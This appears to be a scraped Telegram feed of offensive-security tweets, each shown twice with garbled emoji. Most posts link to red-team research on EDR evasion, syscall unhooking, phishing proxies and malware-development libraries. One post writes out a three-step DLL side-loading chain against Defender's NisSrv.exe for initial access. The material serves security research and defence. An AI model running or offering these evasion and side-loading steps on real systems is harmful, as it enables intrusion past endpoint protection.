π [ tifkin_, Lee Christensen ]
Users password/doc syncing in corporate environments is dangerous. I've seen many corporate users - particularly IT admins - with Chrome Password sync enabled or Last/pass/1pass installed.
The home computer the DA password is synced to that their kids use doesn't have <FancyEDR>
π₯ [ tweet ]
Users password/doc syncing in corporate environments is dangerous. I've seen many corporate users - particularly IT admins - with Chrome Password sync enabled or Last/pass/1pass installed.
The home computer the DA password is synced to that their kids use doesn't have <FancyEDR>
π₯ [ tweet ]
π [ vinopaljiri, JiΕΓ Vinopal ]
Using #Powershell based on .NET >= 5 or .NET Core (so also latest Powershell Linux/Windows) you can easily natively manipulate with PE and do things like in the picture below (ML processing of .data section strings using #StringSifter) πππ
π₯ [ tweet ]
Using #Powershell based on .NET >= 5 or .NET Core (so also latest Powershell Linux/Windows) you can easily natively manipulate with PE and do things like in the picture below (ML processing of .data section strings using #StringSifter) πππ
π₯ [ tweet ]
π [ an0n_r0, an0n ]
had to fix couple of bugs of the sideload cmd in Sliver, but now it loads Mimikatz DLL (using Donut behind the scenes) and even bypasses Defender without much effort. it is still not perfect, output fetching is not working for some reason, but it is almost functional.
π₯ [ tweet ]
had to fix couple of bugs of the sideload cmd in Sliver, but now it loads Mimikatz DLL (using Donut behind the scenes) and even bypasses Defender without much effort. it is still not perfect, output fetching is not working for some reason, but it is almost functional.
π₯ [ tweet ]
π [ NinjaParanoid, Chetan Nayak (Brute Ratel C4) ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
π https://www.youtube.com/watch?v=qakZwswi5Jw
π₯ [ tweet ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
π https://www.youtube.com/watch?v=qakZwswi5Jw
π₯ [ tweet ]
π [ ORCA10K, ORCA ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
π https://gitlab.com/ORCA000/perunsfart
π₯ [ tweet ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
π https://gitlab.com/ORCA000/perunsfart
π₯ [ tweet ]
π [ BlWasp_, BlackWasp ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
π https://github.com/Porchetta-Industries/CrackMapExec/pull/610
π₯ [ tweet ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
π https://github.com/Porchetta-Industries/CrackMapExec/pull/610
π₯ [ tweet ]
π [ HuskyHacksMK, Matt | HuskyHacks ]
π¬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
πLesson: https://t.co/cIuqUKd4Fw
π¦ Lab Repo: https://t.co/apbskSMBkY
π https://notes.huskyhacks.dev/notes/on-patching-binaries
π https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
π₯ [ tweet ]
π¬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
πLesson: https://t.co/cIuqUKd4Fw
π¦ Lab Repo: https://t.co/apbskSMBkY
π https://notes.huskyhacks.dev/notes/on-patching-binaries
π https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
π₯ [ tweet ]
π [ httpyxel, yxel ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
π https://github.com/janoglezcampos/DeathSleep
π₯ [ tweet ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
π https://github.com/janoglezcampos/DeathSleep
π₯ [ tweet ]
π [ DirectoryRanger, DirectoryRanger ]
Good series by @martinsohndk:
π https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
π₯ [ tweet ]
Good series by @martinsohndk:
π https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
π₯ [ tweet ]
π [ ShitSecure, S3cur3Th1sSh1t ]
Really like the βMalware Devβ posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics ππ₯
https://t.co/iRl72r4yz9
π https://0xpat.github.io/
π₯ [ tweet ]
Really like the βMalware Devβ posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics ππ₯
https://t.co/iRl72r4yz9
π https://0xpat.github.io/
π₯ [ tweet ]
π [ podalirius_, Podalirius ]
[#thread π§΅] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! π
https://t.co/EOWfTbFCRh
π https://github.com/p0dalirius/ApacheTomcatScanner/
π₯ [ tweet ]
[#thread π§΅] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! π
https://t.co/EOWfTbFCRh
π https://github.com/p0dalirius/ApacheTomcatScanner/
π₯ [ tweet ]
π [ mariuszbit, mgeeky | Mariusz Banach ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access π₯
π₯ [ tweet ][ quote ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access π₯
π₯ [ tweet ][ quote ]
π [ ORCA10K, ORCA ]
decided to build libraries to help in malware development, so far I've done only little, but here it is:
https://t.co/d0AfK2ypr0
π https://github.com/MalwareApiLib/MalwareApiLibrary
π₯ [ tweet ]
decided to build libraries to help in malware development, so far I've done only little, but here it is:
https://t.co/d0AfK2ypr0
π https://github.com/MalwareApiLib/MalwareApiLibrary
π₯ [ tweet ]
π [ MDSecLabs, MDSec ]
"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq
π https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/
π₯ [ tweet ]
"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq
π https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/
π₯ [ tweet ]
π [ R0h1rr1m, Furkan GΓΆksel ]
Another technique which is Call Stack Spoofing is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf 's PoC and blogpost. You can find the repository below.
https://t.co/R7y34dQaYu
π https://github.com/frkngksl/NimicStack
π₯ [ tweet ]
Another technique which is Call Stack Spoofing is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf 's PoC and blogpost. You can find the repository below.
https://t.co/R7y34dQaYu
π https://github.com/frkngksl/NimicStack
π₯ [ tweet ]
πΉ [ snovvcrash, snπ₯Άvvcrπ₯sh ]
[#HackTip β] Such a tiny code snippet that can help you bypass some automatic sandbox detections β³
#maldev
π₯ [ tweet ]
[#HackTip β] Such a tiny code snippet that can help you bypass some automatic sandbox detections β³
#maldev
π₯ [ tweet ]
π [ SemperisTech, Semperis ]
Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory--and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn
π https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/
π₯ [ tweet ]
Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory--and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn
π https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/
π₯ [ tweet ]
π [ s4ntiago_p, S4ntiagoP ]
A small blogpost (and PoC) about creating Windows processes using syscalls π
https://t.co/P5isRGOnN7
π https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls
π₯ [ tweet ]
A small blogpost (and PoC) about creating Windows processes using syscalls π
https://t.co/P5isRGOnN7
π https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls
π₯ [ tweet ]
π [ _RastaMouse, Rasta Mouse ]
[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.
https://t.co/8gShYwEyPY
π https://rastamouse.me/evilginx-meet-bitb/
π₯ [ tweet ]
[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.
https://t.co/8gShYwEyPY
π https://rastamouse.me/evilginx-meet-bitb/
π₯ [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
π [ MDSecLabs, MDSec ]
In part 3 of our "How I Met Your Beacon" series, @domchell analyses techniques to detect Brute Ratel https://t.co/4wNtM5mNH7 #brc4
π https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
π₯ [ tweet ]
In part 3 of our "How I Met Your Beacon" series, @domchell analyses techniques to detect Brute Ratel https://t.co/4wNtM5mNH7 #brc4
π https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
π₯ [ tweet ]
π [ last0x00, last ]
After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt persistences implanted in their Windows machines. Check it out!
https://t.co/oma0h8gFfF
π https://github.com/last-byte/PersistenceSniper/
π₯ [ tweet ]
After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt persistences implanted in their Windows machines. Check it out!
https://t.co/oma0h8gFfF
π https://github.com/last-byte/PersistenceSniper/
π₯ [ tweet ]